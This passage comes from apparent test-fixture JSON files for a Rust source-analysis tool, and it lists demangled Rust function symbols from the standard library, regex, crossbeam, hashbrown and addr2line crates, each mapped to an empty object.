"core::ptr::drop_in_place\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::result::Result\u003cregex::re_unicode::Regex,regex::error::Error\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::atomic::Owned\u003ccrossbeam_epoch::sync::queue::Node\u003ccrossbeam_epoch::internal::SealedBag\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::collector::Collector\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::internal::Bag\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::internal::Global\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::internal::SealedBag\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::sync::list::List\u003ccrossbeam_epoch::internal::Local\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::sync::queue::Queue\u003ccrossbeam_epoch::internal::SealedBag\u003e\u003e": {}, "core::ptr::drop_in_place\u003cdyn aho_corasick::ahocorasick::AcAutomaton\u003e": {}, "core::ptr::drop_in_place\u003chashbrown::map::HashMap\u003calloc::string::String,usize,std::collections::hash::map::RandomState\u003e\u003e": {}, "core::ptr::drop_in_place\u003chashbrown::map::HashMap\u003cregex::dfa::State,u32,std::collections::hash::map::RandomState\u003e\u003e": {}, "core::ptr::drop_in_place\u003chashbrown::raw::RawTable\u003c(alloc::string::String,usize)\u003e\u003e": {}, "core::ptr::drop_in_place\u003chashbrown::raw::RawTable\u003c(regex::dfa::State,u32)\u003e\u003e": {}, "core::ptr::drop_in_place\u003cmemchr::cow::CowBytes\u003e": {}, "core::ptr::drop_in_place\u003cmemchr::cow::Imp\u003e": {}, "core::ptr::drop_in_place\u003cmemchr::memmem::Finder\u003e": {}, "core::ptr::drop_in_place\u003cmemchr::memmem::Searcher\u003e": {}, "core::ptr::drop_in_place\u003cregex::backtrack::Cache\u003e": {}, "core::ptr::drop_in_place\u003cregex::dfa::Cache\u003e": {}, "core::ptr::drop_in_place\u003cregex::dfa::CacheInner\u003e": {}, "core::ptr::drop_in_place\u003cregex::dfa::State\u003e": {}, "core::ptr::drop_in_place\u003cregex::dfa::StateMap\u003e": {}, "core::ptr::drop_in_place\u003cregex::dfa::Transitions\u003e": {}, "core::ptr::drop_in_place\u003cregex::error::Error\u003e": {}, "core::ptr::drop_in_place\u003cregex::exec::Exec\u003e": {}, "core::ptr::drop_in_place\u003cregex::exec::ExecReadOnly\u003e": {}, "core::ptr::drop_in_place\u003cregex::exec::ProgramCacheInner\u003e": {}, "core::ptr::drop_in_place\u003cregex::literal::imp::LiteralSearcher\u003e": {}, "core::ptr::drop_in_place\u003cregex::literal::imp::Matcher\u003e": {}, "core::ptr::drop_in_place\u003cregex::literal::imp::Memmem\u003e": {}, "core::ptr::drop_in_place\u003cregex::literal::imp::SingleByteSet\u003e": {}, "core::ptr::drop_in_place\u003cregex::pikevm::Cache\u003e": {}, "core::ptr::drop_in_place\u003cregex::pikevm::Threads\u003e": {}, "core::ptr::drop_in_place\u003cregex::pool::Pool\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003cregex::prog::Inst\u003e": {}, "core::ptr::drop_in_place\u003cregex::prog::InstRanges\u003e": {}, "core::ptr::drop_in_place\u003cregex::prog::Program\u003e": {}, "core::ptr::drop_in_place\u003cregex::re_unicode::Regex\u003e": {}, "core::ptr::drop_in_place\u003cregex::sparse::SparseSet\u003e": {}, "core::ptr::drop_in_place\u003cregex_syntax::hir::literal::Literal\u003e": {}, "core::ptr::drop_in_place\u003cstd::collections::hash::map::HashMap\u003calloc::string::String,usize\u003e\u003e": {}, "core::ptr::drop_in_place\u003cstd::collections::hash::map::HashMap\u003cregex::dfa::State,u32\u003e\u003e": {}, "core::ptr::drop_in_place\u003cstd::sync::mutex::Mutex\u003calloc::vec::Vec\u003calloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e\u003e\u003e": {}, "core::ptr::mut_ptr::\u003cimpl *mut T\u003e::drop_in_place": {}, "core::ptr::mut_ptr::\u003cimpl *mut T\u003e::offset": {}, "core::ptr::mut_ptr::\u003cimpl *mut T\u003e::sub": {}, "core::ptr::non_null::NonNull::as_ref": {}, "core::ptr::read": {}, "core::ptr::write": {}, "core::result::Result::branch": {}, "core::result::Result::fmt": {}, "core::result::Result::from_residual": {}, "core::result::Result::map": {}, "core::result::Result::map_err": {}, "core::result::Result::unwrap": {}, "core::sync::atomic::AtomicUsize::compare_exchange": {}, "core::sync::atomic::AtomicUsize::fetch_sub": {}, "core::sync::atomic::AtomicUsize::load": {}, "core::sync::atomic::atomic_compare_exchange": {}, "core::sync::atomic::atomic_load": {}, "core::sync::atomic::atomic_sub": {}, "crossbeam_epoch::atomic::Atomic::compare_and_set": {}, "crossbeam_epoch::atomic::Atomic::load": {}, "crossbeam_epoch::atomic::Owned::drop": {}, "crossbeam_epoch::atomic::Shared::as_raw": {}, "crossbeam_epoch::atomic::Shared::deref": {}, "crossbeam_epoch::atomic::Shared::tag": {}, "crossbeam_epoch::atomic::decompose_data": {}, "crossbeam_epoch::deferred::Deferred::new": {}, "crossbeam_epoch::deferred::Deferred::new::call": {}, "crossbeam_epoch::guard::Guard::defer_destroy": {}, "crossbeam_epoch::guard::Guard::defer_unchecked": {}, "crossbeam_epoch::guard::Guard::defer_unchecked::{{closure}}": {}, "crossbeam_epoch::sync::list::List::drop": {}, "crossbeam_epoch::sync::queue::Queue::drop": {}, "crossbeam_epoch::sync::queue::Queue::pop_internal": {}, "crossbeam_epoch::sync::queue::Queue::pop_internal::{{closure}}": {}, "crossbeam_epoch::sync::queue::Queue::try_pop": {}, "hashbrown::raw::Bucket::drop": {}, "hashbrown::raw::Bucket::next_n": {}, "hashbrown::raw::RawIter::next": {}, "hashbrown::raw::RawIterRange::new": {}, "hashbrown::raw::RawIterRange::next_impl": {}, "hashbrown::raw::RawTable::data_end": {}, "hashbrown::raw::RawTable::drop": {}, "hashbrown::raw::RawTable::drop_elements": {}, "hashbrown::raw::RawTable::free_buckets": {}, "hashbrown::raw::RawTable::is_empty": {}, "hashbrown::raw::RawTable::iter": {}, "hashbrown::raw::RawTable::len": {}, "hashbrown::raw::RawTableInner::buckets": {}, "hashbrown::raw::RawTableInner::free_buckets": {}, "hashbrown::raw::RawTableInner::is_empty_singleton": {}, "hashbrown::raw::TableLayout::calculate_layout_for": {}, "hashbrown::raw::bitmask::BitMask::invert": {}, "hashbrown::raw::bitmask::BitMask::lowest_set_bit": {}, "hashbrown::raw::bitmask::BitMask::remove_lowest_bit": {}, "hashbrown::raw::sse2::Group::load_aligned": {}, "hashbrown::raw::sse2::Group::match_empty_or_deleted": {}, "hashbrown::raw::sse2::Group::match_full": {}, "test_rust_2::another_func": {}, "test_rust_2::exported_func": {} } ================================================ FILE: internal/sourceanalysis/testdata/rust/functions/simple.json ================================================ { "core::fmt::Arguments::new_v1": {}, "test_rust_2::a_cool_func_name": {} } ================================================ FILE: internal/sourceanalysis/testdata/rust/functions/test-rust-2.json ================================================ { "\u0026T::as_ref": {}, "\u0026T::fmt": {}, "\u0026[u8]::spec_new_impl": {}, "\u0026mut I::len": {}, "\u0026mut T::fmt": {}, "\u0026mut W::write_char": {}, "\u0026mut W::write_fmt": {}, "\u0026mut W::write_str": {}, "\u0026std::io::stdio::Stderr::write_fmt": {}, "\u0026std::io::stdio::Stdout::write_fmt": {}, "\u0026str::into_searcher": {}, "\u0026str::is_prefix_of": {}, "\u0026str::is_suffix_of": {}, "\u0026u32::shl": {}, "\u0026u8::bitand": {}, "\u0026u8::shr": {}, "()::fmt": {}, "*const T::fmt": {}, "*mut T::fmt": {}, "\u003cT as alloc::slice::hack::ConvertVec\u003e::to_vec::DropGuard::drop": {}, "\u003calloc::boxed::Box\u003cdyn core::error::Error+core::marker::Send+core::marker::Sync\u003e as core::convert::From\u003calloc::string::String\u003e\u003e::from::StringError::description": {}, "\u003calloc::boxed::Box\u003cdyn core::error::Error+core::marker::Send+core::marker::Sync\u003e as core::convert::From\u003calloc::string::String\u003e\u003e::from::StringError::fmt": {}, "\u003calloc::vec::drain::Drain as core::ops::drop::Drop\u003e::drop::DropGuard::drop": {}, "\u003calloc::vec::into_iter::IntoIter as core::ops::drop::Drop\u003e::drop::DropGuard::drop": {}, "\u003cdyn core::any::Any+core::marker::Send\u003e::downcast_ref": {}, "\u003cdyn core::any::Any\u003e::downcast_ref": {}, "\u003cdyn core::any::Any\u003e::is": {}, "F::into_searcher": {}, "I::into_iter": {}, "T::clone": {}, "T::from_elem": {}, "T::into": {}, "T::spec_eq": {}, "T::spec_ne": {}, "T::spec_new_impl": {}, "T::to_vec": {}, "T::type_id": {}, "[A]::equal": {}, "[T]::fmt": {}, "addr2line::Context::find_frames": {}, "addr2line::Context::find_units": {}, "addr2line::Context::find_units_range": {}, "addr2line::Context::find_units_range::{{closure}}": {}, "addr2line::Context::from_dwarf": {}, "addr2line::FrameIter::next": {}, "addr2line::FrameIter::next::{{closure}}": {}, "addr2line::LocationRangeUnitIter::new": {}, "addr2line::LocationRangeUnitIter::new::{{closure}}": {}, "addr2line::RangeAttributes::for_each_range": {}, "addr2line::RangeAttributes::for_each_range::{{closure}}": {}, "addr2line::ResDwarf::find_unit": {}, "addr2line::ResDwarf::parse": {}, "addr2line::ResDwarf::parse::{{closure}}": {}, "addr2line::ResUnit::find_function_or_location": {}, "addr2line::ResUnit::find_function_or_location::{{closure}}": {}, "addr2line::ResUnit::find_location": {}, "addr2line::ResUnit::parse_functions": {}, "addr2line::ResUnit::parse_functions::{{closure}}": {}, "addr2line::ResUnit::parse_lines": {}, "addr2line::ResUnit::parse_lines::{{closure}}": {}, "addr2line::ResUnit::render_file": {}, "addr2line::function::Function::find_inlined_functions": {}, "addr2line::function::Function::find_inlined_functions::{{closure}}": {}, "addr2line::function::Function::parse": {}, "addr2line::function::Function::parse::{{closure}}": {}, "addr2line::function::Function::parse_children": {}, "addr2line::function::Function::skip": {}, "addr2line::function::Functions::find_address": {}, "addr2line::function::Functions::find_address::{{closure}}": {}, "addr2line::function::Functions::parse": {}, "addr2line::function::Functions::parse::{{closure}}": {}, "addr2line::function::InlinedFunction::parse": {}, "addr2line::function::InlinedFunction::parse::{{closure}}": {}, "addr2line::function::name_attr": {}, "addr2line::function::name_entry": {}, "addr2line::lazy::LazyCell::borrow_with": {}, "alloc::alloc::Global::alloc_impl": {}, "alloc::alloc::Global::allocate": {}, "alloc::alloc::Global::allocate_zeroed": {}, "alloc::alloc::Global::deallocate": {}, "alloc::alloc::Global::grow": {}, "alloc::alloc::Global::grow_impl": {}, "alloc::alloc::Global::shrink": {}, "alloc::alloc::alloc": {}, "alloc::alloc::alloc_zeroed": {}, "alloc::alloc::box_free": {}, "alloc::alloc::dealloc": {}, "alloc::alloc::exchange_malloc": {}, "alloc::alloc::handle_alloc_error": {}, "alloc::alloc::handle_alloc_error::rt_error": {}, "alloc::alloc::realloc": {}, "alloc::borrow::Cow::as_ref": {}, "alloc::borrow::Cow::deref": {}, "alloc::borrow::Cow::into_owned": {}, "alloc::boxed::Box::fmt": {}, "alloc::boxed::Box::from_raw": {}, "alloc::boxed::Box::from_raw_in": {}, "alloc::boxed::Box::into_raw": {}, "alloc::boxed::Box::into_raw_with_allocator": {}, "alloc::boxed::Box::into_unique": {}, "alloc::boxed::Box::leak": {}, "alloc::boxed::Box::new": {}, "alloc::boxed::Box::next": {}, "alloc::boxed::Box::size_hint": {}, "alloc::boxed::Box\u003c[T],A\u003e::clone": {}, "alloc::boxed::Box\u003cdyn core::error::Error+core::marker::Send+core::marker::Sync\u003e::from": {}, "alloc::collections::btree::map::BTreeMap::drop": {}, "alloc::collections::btree::map::BTreeMap::get": {}, "alloc::collections::btree::map::BTreeMap::into_iter": {}, "alloc::collections::btree::map::IntoIter::drop": {}, "alloc::collections::btree::map::IntoIter::dying_next": {}, "alloc::collections::btree::mem::replace": {}, "alloc::collections::btree::navigate::\u003cimpl alloc::collections::btree::node::Handle\u003calloc::collections::btree::node::NodeRef\u003cBorrowType,K,V,alloc::collections::btree::node::marker::LeafOrInternal\u003e,alloc::collections::btree::node::marker::KV\u003e\u003e::next_leaf_edge": {}, "alloc::collections::btree::navigate::\u003cimpl alloc::collections::btree::node::Handle\u003calloc::collections::btree::node::NodeRef\u003calloc::collections::btree::node::marker::Dying,K,V,alloc::collections::btree::node::marker::Leaf\u003e,alloc::collections::btree::node::marker::Edge\u003e\u003e::deallocating_end": {}, "alloc::collections::btree::navigate::\u003cimpl alloc::collections::btree::node::Handle\u003calloc::collections::btree::node::NodeRef\u003calloc::collections::btree::node::marker::Dying,K,V,alloc::collections::btree::node::marker::Leaf\u003e,alloc::collections::btree::node::marker::Edge\u003e\u003e::deallocating_next": {}, "alloc::collections::btree::navigate::\u003cimpl alloc::collections::btree::node::Handle\u003calloc::collections::btree::node::NodeRef\u003calloc::collections::btree::node::marker::Dying,K,V,alloc::collections::btree::node::marker::Leaf\u003e,alloc::collections::btree::node::marker::Edge\u003e\u003e::deallocating_next_unchecked": {}, "alloc::collections::btree::navigate::\u003cimpl alloc::collections::btree::node::Handle\u003calloc::collections::btree::node::NodeRef\u003calloc::collections::btree::node::marker::Dying,K,V,alloc::collections::btree::node::marker::Leaf\u003e,alloc::collections::btree::node::marker::Edge\u003e\u003e::deallocating_next_unchecked::{{closure}}": {}, "alloc::collections::btree::navigate::\u003cimpl alloc::collections::btree::node::NodeRef\u003cBorrowType,K,V,alloc::collections::btree::node::marker::LeafOrInternal\u003e\u003e::first_leaf_edge": {}, "alloc::collections::btree::navigate::LazyLeafRange::init_front": {}, "alloc::collections::btree::navigate::LazyLeafRange\u003calloc::collections::btree::node::marker::Dying,K,V\u003e::deallocating_end": {}, "alloc::collections::btree::navigate::LazyLeafRange\u003calloc::collections::btree::node::marker::Dying,K,V\u003e::deallocating_next_unchecked": {}, "alloc::collections::btree::navigate::LazyLeafRange\u003calloc::collections::btree::node::marker::Dying,K,V\u003e::take_front": {}, "alloc::collections::btree::node::Handle\u003calloc::collections::btree::node::NodeRef,alloc::collections::btree::node::marker::Edge\u003e::right_kv": {}, "alloc::collections::btree::node::Handle\u003calloc::collections::btree::node::NodeRef\u003cBorrowType,K,V,alloc::collections::btree::node::marker::Internal\u003e,alloc::collections::btree::node::marker::Edge\u003e::descend": {}, "alloc::collections::btree::node::Handle\u003calloc::collections::btree::node::NodeRef\u003cBorrowType,K,V,alloc::collections::btree::node::marker::LeafOrInternal\u003e,Type\u003e::force": {}, "alloc::collections::btree::node::Handle\u003calloc::collections::btree::node::NodeRef\u003calloc::collections::btree::node::marker::Dying,K,V,NodeType\u003e,alloc::collections::btree::node::marker::KV\u003e::drop_key_val": {}, "alloc::collections::btree::node::NodeRef::ascend": {}, "alloc::collections::btree::node::NodeRef::ascend::{{closure}}": {}, "alloc::collections::btree::node::NodeRef::len": {}, "alloc::collections::btree::node::NodeRef\u003cBorrowType,K,V,alloc::collections::btree::node::marker::LeafOrInternal\u003e::force": {}, "alloc::collections::btree::node::NodeRef\u003calloc::collections::btree::node::marker::Dying,K,V,alloc::collections::btree::node::marker::LeafOrInternal\u003e::deallocate_and_ascend": {}, "alloc::collections::btree::node::NodeRef\u003calloc::collections::btree::node::marker::Immut,K,V,Type\u003e::keys": {}, "alloc::collections::btree::search::\u003cimpl alloc::collections::btree::node::NodeRef\u003cBorrowType,K,V,alloc::collections::btree::node::marker::LeafOrInternal\u003e\u003e::search_tree": {}, "alloc::collections::btree::search::\u003cimpl alloc::collections::btree::node::NodeRef\u003e::find_key_index": {}, "alloc::collections::btree::search::\u003cimpl alloc::collections::btree::node::NodeRef\u003e::search_node": {}, "alloc::ffi::c_str::CString::as_bytes_with_nul": {}, "alloc::ffi::c_str::CString::clone": {}, "alloc::ffi::c_str::CString::deref": {}, "alloc::ffi::c_str::CString::drop": {}, "alloc::ffi::c_str::CString::from_vec_unchecked": {}, "alloc::ffi::c_str::CString::new": {}, "alloc::ffi::c_str::CString::new::spec_new_impl_bytes": {}, "alloc::ffi::c_str::NulError::fmt": {}, "alloc::fmt::format": {}, "alloc::fmt::format::format_inner": {}, "alloc::fmt::format::{{closure}}": {}, "alloc::raw_vec::RawVec::allocate_in": {}, "alloc::raw_vec::RawVec::capacity": {}, "alloc::raw_vec::RawVec::current_memory": {}, "alloc::raw_vec::RawVec::drop": {}, "alloc::raw_vec::RawVec::grow_amortized": {}, "alloc::raw_vec::RawVec::grow_exact": {}, "alloc::raw_vec::RawVec::needs_to_grow": {}, "alloc::raw_vec::RawVec::ptr": {}, "alloc::raw_vec::RawVec::reserve": {}, "alloc::raw_vec::RawVec::reserve::do_reserve_and_handle": {}, "alloc::raw_vec::RawVec::reserve_exact": {}, "alloc::raw_vec::RawVec::reserve_for_push": {}, "alloc::raw_vec::RawVec::set_ptr_and_cap": {}, "alloc::raw_vec::RawVec::shrink": {}, "alloc::raw_vec::RawVec::shrink_to_fit": {}, "alloc::raw_vec::RawVec::try_reserve_exact": {}, "alloc::raw_vec::RawVec::with_capacity_in": {}, "alloc::raw_vec::RawVec::with_capacity_zeroed_in": {}, "alloc::raw_vec::capacity_overflow": {}, "alloc::raw_vec::finish_grow": {}, "alloc::raw_vec::handle_reserve": {}, "alloc::rc::is_dangling": {}, "alloc::slice::\u003cimpl [T]\u003e::sort_by": {}, "alloc::slice::\u003cimpl [T]\u003e::sort_by::{{closure}}": {}, "alloc::slice::\u003cimpl [T]\u003e::sort_by_key": {}, "alloc::slice::\u003cimpl [T]\u003e::sort_by_key::{{closure}}": {}, "alloc::slice::\u003cimpl [T]\u003e::to_vec": {}, "alloc::slice::\u003cimpl [T]\u003e::to_vec_in": {}, "alloc::slice::\u003cimpl alloc::borrow::ToOwned for [T]\u003e::to_owned": {}, "alloc::slice::hack::to_vec": {}, "alloc::slice::insert_head": {}, "alloc::slice::insert_head::InsertionHole::drop": {}, "alloc::slice::merge": {}, "alloc::slice::merge::MergeHole::drop": {}, "alloc::slice::merge::get_and_increment": {}, "alloc::slice::merge_sort": {}, "alloc::slice::merge_sort::collapse": {}, "alloc::str::\u003cimpl alloc::borrow::ToOwned for str\u003e::to_owned": {}, "alloc::string::String::deref": {}, "alloc::string::String::fmt": {}, "alloc::string::String::from": {}, "alloc::string::String::from_utf8_lossy": {}, "alloc::string::String::from_utf8_unchecked": {}, "alloc::string::String::index": {}, "alloc::string::String::new": {}, "alloc::string::String::push": {}, "alloc::string::String::push_str": {}, "alloc::string::String::with_capacity": {}, "alloc::string::String::write_char": {}, "alloc::string::String::write_str": {}, "alloc::sync::Arc::allocate_for_layout": {}, "alloc::sync::Arc::allocate_for_layout::{{closure}}": {}, "alloc::sync::Arc::clone": {}, "alloc::sync::Arc::deref": {}, "alloc::sync::Arc::drop": {}, "alloc::sync::Arc::drop_slow": {}, "alloc::sync::Arc::get_mut_unchecked": {}, "alloc::sync::Arc::inner": {}, "alloc::sync::Arc::new": {}, "alloc::sync::Arc::new_uninit": {}, "alloc::sync::Arc::new_uninit::{{closure}}": {}, "alloc::sync::Arc::try_allocate_for_layout": {}, "alloc::sync::Weak::drop": {}, "alloc::sync::Weak::inner": {}, "alloc::vec::Vec::append_elements": {}, "alloc::vec::Vec::as_mut_ptr": {}, "alloc::vec::Vec::as_ptr": {}, "alloc::vec::Vec::capacity": {}, "alloc::vec::Vec::clone": {}, "alloc::vec::Vec::drain": {}, "alloc::vec::Vec::drop": {}, "alloc::vec::Vec::extend": {}, "alloc::vec::Vec::extend_desugared": {}, "alloc::vec::Vec::extend_from_slice": {}, "alloc::vec::Vec::extend_with": {}, "alloc::vec::Vec::fmt": {}, "alloc::vec::Vec::from_iter": {}, "alloc::vec::Vec::index": {}, "alloc::vec::Vec::index_mut": {}, "alloc::vec::Vec::insert": {}, "alloc::vec::Vec::into_boxed_slice": {}, "alloc::vec::Vec::into_iter": {}, "alloc::vec::Vec::is_empty": {}, "alloc::vec::Vec::len": {}, "alloc::vec::Vec::new": {}, "alloc::vec::Vec::pop": {}, "alloc::vec::Vec::push": {}, "alloc::vec::Vec::remove": {}, "alloc::vec::Vec::reserve": {}, "alloc::vec::Vec::reserve_exact": {}, "alloc::vec::Vec::resize": {}, "alloc::vec::Vec::set_len": {}, "alloc::vec::Vec::shrink_to_fit": {}, "alloc::vec::Vec::spare_capacity_mut": {}, "alloc::vec::Vec::spec_extend": {}, "alloc::vec::Vec::spec_extend::{{closure}}": {}, "alloc::vec::Vec::truncate": {}, "alloc::vec::Vec::with_capacity": {}, "alloc::vec::Vec::with_capacity_in": {}, "alloc::vec::drain::Drain::drop": {}, "alloc::vec::drain::Drain::next": {}, "alloc::vec::drain::Drain::size_hint": {}, "alloc::vec::from_elem": {}, "alloc::vec::into_iter::IntoIter::drop": {}, "alloc::vec::into_iter::IntoIter::next": {}, "alloc::vec::into_iter::IntoIter::next_back": {}, "alloc::vec::set_len_on_drop::SetLenOnDrop::drop": {}, "alloc::vec::set_len_on_drop::SetLenOnDrop::increment_len": {}, "char::fmt": {}, "char::into_searcher": {}, "char::is_prefix_of": {}, "char::is_suffix_of": {}, "core::alloc::layout::Layout::array": {}, "core::alloc::layout::Layout::array::inner": {}, "core::alloc::layout::Layout::size": {}, "core::any::TypeId::eq": {}, "core::array::\u003cimpl core::clone::Clone for [T; N]\u003e::clone": {}, "core::array::\u003cimpl core::ops::index::Index for [T; N]\u003e::index": {}, "core::array::equality::\u003cimpl core::cmp::PartialEq\u003c[A; N]\u003e for \u0026[B]\u003e::ne": {}, "core::array::equality::\u003cimpl core::cmp::PartialEq\u003c[A; N]\u003e for [B]\u003e::ne": {}, "core::array::equality::\u003cimpl core::cmp::PartialEq\u003c[B; N]\u003e for [A; N]\u003e::eq": {}, "core::array::equality::\u003cimpl core::cmp::PartialEq\u003c[B; N]\u003e for [A; N]\u003e::ne": {}, "core::bool::\u003cimpl bool\u003e::then": {}, "core::cell::BorrowMutError::fmt": {}, "core::cell::BorrowRefMut::drop": {}, "core::cell::BorrowRefMut::new": {}, "core::cell::Cell::get": {}, "core::cell::Cell::replace": {}, "core::cell::Cell::set": {}, "core::cell::Cell::take": {}, "core::cell::RefCell::borrow_mut": {}, "core::cell::RefCell::try_borrow_mut": {}, "core::char::EscapeDebug::next": {}, "core::char::EscapeDebug::size_hint": {}, "core::char::EscapeDefault::len": {}, "core::char::EscapeDefault::next": {}, "core::char::EscapeDefault::size_hint": {}, "core::char::EscapeUnicode::next": {}, "core::char::convert::char_try_from_u32": {}, "core::char::convert::from_digit": {}, "core::char::convert::from_u32": {}, "core::char::from_digit": {}, "core::char::from_u32": {}, "core::char::methods::\u003cimpl char\u003e::encode_utf8": {}, "core::char::methods::\u003cimpl char\u003e::escape_debug": {}, "core::char::methods::\u003cimpl char\u003e::escape_debug_ext": {}, "core::char::methods::\u003cimpl char\u003e::escape_unicode": {}, "core::char::methods::\u003cimpl char\u003e::is_control": {}, "core::char::methods::\u003cimpl char\u003e::is_digit": {}, "core::char::methods::\u003cimpl char\u003e::is_grapheme_extended": {}, "core::char::methods::\u003cimpl char\u003e::len_utf8": {}, "core::char::methods::\u003cimpl char\u003e::to_digit": {}, "core::char::methods::encode_utf8_raw": {}, "core::char::methods::len_utf8": {}, "core::clone::impls::\u003cimpl core::clone::Clone for \u0026T\u003e::clone": {}, "core::clone::impls::\u003cimpl core::clone::Clone for bool\u003e::clone": {}, "core::clone::impls::\u003cimpl core::clone::Clone for u32\u003e::clone": {}, "core::clone::impls::\u003cimpl core::clone::Clone for u64\u003e::clone": {}, "core::clone::impls::\u003cimpl core::clone::Clone for u8\u003e::clone": {}, "core::cmp::Ord::max": {}, "core::cmp::Ord::min": {}, "core::cmp::PartialEq::ne": {}, "core::cmp::PartialOrd::ge": {}, "core::cmp::PartialOrd::le": {}, "core::cmp::PartialOrd::lt": {}, "core::cmp::impls::\u003cimpl core::cmp::Ord for i64\u003e::cmp": {}, "core::cmp::impls::\u003cimpl core::cmp::Ord for isize\u003e::cmp": {}, "core::cmp::impls::\u003cimpl core::cmp::Ord for u32\u003e::cmp": {}, "core::cmp::impls::\u003cimpl core::cmp::Ord for u64\u003e::cmp": {}, "core::cmp::impls::\u003cimpl core::cmp::Ord for usize\u003e::cmp": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialEq for u16\u003e::eq": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialEq for u32\u003e::eq": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialEq for u64\u003e::eq": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialEq for u8\u003e::eq": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialEq for usize\u003e::eq": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialEq\u003c\u0026B\u003e for \u0026A\u003e::eq": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialEq\u003c\u0026B\u003e for \u0026A\u003e::ne": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialOrd for i64\u003e::partial_cmp": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialOrd for isize\u003e::partial_cmp": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialOrd for u16\u003e::lt": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialOrd for u64\u003e::lt": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialOrd for u8\u003e::lt": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialOrd for usize\u003e::gt": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialOrd for usize\u003e::lt": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialOrd for usize\u003e::partial_cmp": {}, "core::cmp::impls::\u003cimpl core::cmp::PartialOrd\u003c\u0026B\u003e for \u0026A\u003e::ge": {}, "core::cmp::max": {}, "core::cmp::max_by": {}, "core::cmp::min": {}, "core::convert::num::\u003cimpl core::convert::From for u16\u003e::from": {}, "core::convert::num::\u003cimpl core::convert::From for u32\u003e::from": {}, "core::convert::num::\u003cimpl core::convert::From for u64\u003e::from": {}, "core::convert::num::\u003cimpl core::convert::From for usize\u003e::from": {}, "core::core_arch::simd::i32x4::new": {}, "core::core_arch::x86::pclmulqdq::mm_clmulepi64_si128": {}, "core::core_arch::x86::sse2::mm_and_si128": {}, "core::core_arch::x86::sse2::mm_cvtsi32_si128": {}, "core::core_arch::x86::sse2::mm_loadu_si128": {}, "core::core_arch::x86::sse2::mm_pause": {}, "core::core_arch::x86::sse2::mm_srli_si128": {}, "core::core_arch::x86::sse2::mm_srli_si128_impl": {}, "core::core_arch::x86::sse2::mm_xor_si128": {}, "core::core_arch::x86::sse41::mm_extract_epi32": {}, "core::error::Error::cause": {}, "core::error::Error::provide": {}, "core::error::Error::type_id": {}, "core::ffi::c_str::CStr::from_ptr": {}, "core::fmt::ArgumentV1::as_usize": {}, "core::fmt::Arguments::as_str": {}, "core::fmt::Arguments::estimated_capacity": {}, "core::fmt::Arguments::fmt": {}, "core::fmt::Arguments::new_v1": {}, "core::fmt::Arguments::new_v1_formatted": {}, "core::fmt::Error::fmt": {}, "core::fmt::Formatter::alternate": {}, "core::fmt::Formatter::debug_list": {}, "core::fmt::Formatter::debug_lower_hex": {}, "core::fmt::Formatter::debug_struct": {}, "core::fmt::Formatter::debug_struct_field1_finish": {}, "core::fmt::Formatter::debug_struct_field2_finish": {}, "core::fmt::Formatter::debug_tuple": {}, "core::fmt::Formatter::debug_tuple_field1_finish": {}, "core::fmt::Formatter::debug_tuple_field2_finish": {}, "core::fmt::Formatter::debug_upper_hex": {}, "core::fmt::Formatter::new": {}, "core::fmt::Formatter::pad": {}, "core::fmt::Formatter::pad_integral": {}, "core::fmt::Formatter::pad_integral::write_prefix": {}, "core::fmt::Formatter::padding": {}, "core::fmt::Formatter::sign_aware_zero_pad": {}, "core::fmt::Formatter::sign_plus": {}, "core::fmt::Formatter::wrap_buf": {}, "core::fmt::Formatter::write_char": {}, "core::fmt::Formatter::write_fmt": {}, "core::fmt::Formatter::write_str": {}, "core::fmt::PostPadding::write": {}, "core::fmt::USIZE_MARKER::{{closure}}": {}, "core::fmt::Write::write_char": {}, "core::fmt::Write::write_fmt": {}, "core::fmt::builders::DebugInner::entry": {}, "core::fmt::builders::DebugInner::entry::{{closure}}": {}, "core::fmt::builders::DebugInner::is_pretty": {}, "core::fmt::builders::DebugList::entries": {}, "core::fmt::builders::DebugList::finish": {}, "core::fmt::builders::DebugList::finish::{{closure}}": {}, "core::fmt::builders::DebugSet::entry": {}, "core::fmt::builders::DebugStruct::field": {}, "core::fmt::builders::DebugStruct::field::{{closure}}": {}, "core::fmt::builders::DebugStruct::finish": {}, "core::fmt::builders::DebugStruct::finish::{{closure}}": {}, "core::fmt::builders::DebugStruct::is_pretty": {}, "core::fmt::builders::DebugTuple::field": {}, "core::fmt::builders::DebugTuple::field::{{closure}}": {}, "core::fmt::builders::DebugTuple::finish": {}, "core::fmt::builders::DebugTuple::finish::{{closure}}": {}, "core::fmt::builders::DebugTuple::is_pretty": {}, "core::fmt::builders::PadAdapter::wrap": {}, "core::fmt::builders::PadAdapter::wrap::{{closure}}": {}, "core::fmt::builders::PadAdapter::write_str": {}, "core::fmt::builders::debug_list_new": {}, "core::fmt::builders::debug_struct_new": {}, "core::fmt::builders::debug_tuple_new": {}, "core::fmt::getcount": {}, "core::fmt::num::\u003cimpl core::fmt::Debug for i32\u003e::fmt": {}, 